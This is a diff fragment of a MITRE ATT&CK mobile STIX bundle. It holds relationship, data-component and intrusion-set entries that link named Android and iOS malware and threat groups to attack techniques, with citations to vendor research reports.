"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4aae6ab8-2a67-4780-a69e-b15ecff7fc5d", + "created": "2023-02-28T21:43:12.487Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:12.487Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can make and block phone calls.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2b065fcf-7ed1-4f88-8910-2eb46bde9ab7", + "created": "2023-01-18T19:19:34.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:52:35.805Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can send stolen data back to the C2 server.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f5d24a31-53d2-4e84-9110-2da0582132cb", + "created": "2020-05-07T15:33:32.936Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Agent Smith](https://attack.mitre.org/software/S0440)’s core malware is disguised as a JPG file, and encrypted with an XOR cipher.(Citation: CheckPoint Agent Smith)", + "modified": "2022-04-15T16:44:17.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c96c3405-1d9b-46e4-8f57-a6c49eb68a31", + "created": "2022-04-06T13:41:17.517Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:41:17.517Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e399430e-30b7-48c5-b70a-f44dc8c175cb", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bf2ea132-c8f3-4ea0-8c4c-bdc95923c3b1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.355Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can activate the victim's microphone.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2acc0c1a-af30-4410-976b-31148df5378d", + "created": "2022-03-28T19:39:42.538Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:39:42.538Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d6a900d-d1c4-4a91-bded-c9062aae384b", + "created": "2021-01-05T20:16:20.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:47:18.774Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has registered for device boot, incoming, and outgoing calls broadcast intents.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a608d3b-aa02-4563-8b6b-c64a491856f5", + "created": "2023-03-03T16:26:20.400Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:26:20.400Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected information about running processes.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3bf4b093-a1a3-48da-9236-bce9514765eb", + "created": "2022-04-05T19:46:05.853Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Samsung Keyboards", + "url": "https://support.samsungknox.com/hc/en-us/articles/360001485027-3rd-party-keyboards-must-be-whitelisted-", + "description": "Samsung. (2019, August 16). 3rd party keyboards must be whitelisted.. Retrieved September 1, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "When using Samsung Knox, third-party keyboards must be explicitly added to an allow list in order to be available to the end-user.(Citation: Samsung Keyboards)", + "modified": "2022-04-05T19:46:05.853Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--78417fce-5aaa-4ad3-a2f1-279fa18bfe45", + "created": "2023-02-06T19:47:26.528Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:47:26.528Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has been distributed in obfuscated and packed form.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--70fa8498-6117-4e15-ae3c-f53d63996826", + "type": "relationship", + "created": "2020-06-26T15:32:25.050Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.050Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect the device’s location.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c3439bdd-a0db-401b-97fd-5e2ec135a396", + "created": "2023-03-20T18:40:12.814Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:40:12.814Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3752c235-0576-47dc-b05d-d3eaeaccfecc", + "type": "relationship", + "created": "2020-12-24T21:55:56.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.688Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has captured audio and can record phone calls.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--188c09ee-ca3b-4bac-ad69-36489c50b5bd", + "created": "2022-04-01T18:50:00.027Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:50:00.027Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--290a627d-172d-494d-a0cc-685f480a1034", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:36:27.983Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) collects call logs.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--084786ee-9384-4a00-9e1b-48f94ea70126", + "created": "2019-09-03T19:45:48.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:45.426Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate calendar events.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03172b09-4f97-4fb8-95f0-92b2d8957408", + "created": "2020-06-26T14:55:13.349Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) has encrypted base64-encoded payload data using RC4 and Curve25519.(Citation: Cybereason EventBot)", + "modified": "2022-04-18T15:57:14.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--48486680-530c-4ed9-aca3-94969aa262b6", + "created": "2019-07-10T15:35:43.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:00.609Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) accesses and exfiltrates the call log.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a610208-06af-425f-a9af-cd0899261e33", + "type": "relationship", + "created": "2020-09-11T15:45:38.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can send SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0291c9d5-8977-420d-8374-b786e3095a73", + "created": "2023-03-20T18:49:53.204Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:53.204Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3e5b5c7a-32e1-4745-8ceb-c46ce7276364", + "created": "2023-02-06T19:46:19.592Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:46:19.592Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has C2 commands to add an infected device to a DDoS pool.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5dc4eaca-ff82-412a-a8dd-168de1857d8c", + "created": "2023-01-18T21:38:58.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:49:16.069Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use input injection via Accessibility Services to simulate user touch inputs, prevent applications from opening, change device settings, and bypass MFA protections.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T19:59:14.491Z", + "name": "API Calls", + "description": "API calls utilized by an application that could indicate malicious activity", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "created": "2023-03-13T19:59:14.491Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-13T20:48:14.540Z", + "name": "System Settings", + "description": "Settings visible to the user on the device", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "created": "2023-03-13T20:48:14.540Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Windshift", + "Bahamut" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "type": "intrusion-set", + "created": "2020-06-25T17:16:39.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0112", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0112" + }, + { + "source_name": "Bahamut", + "description": "(Citation: SANS Windshift August 2018)" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019." + } + ], + "modified": "2021-04-26T14:37:33.234Z", + "name": "Windshift", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + 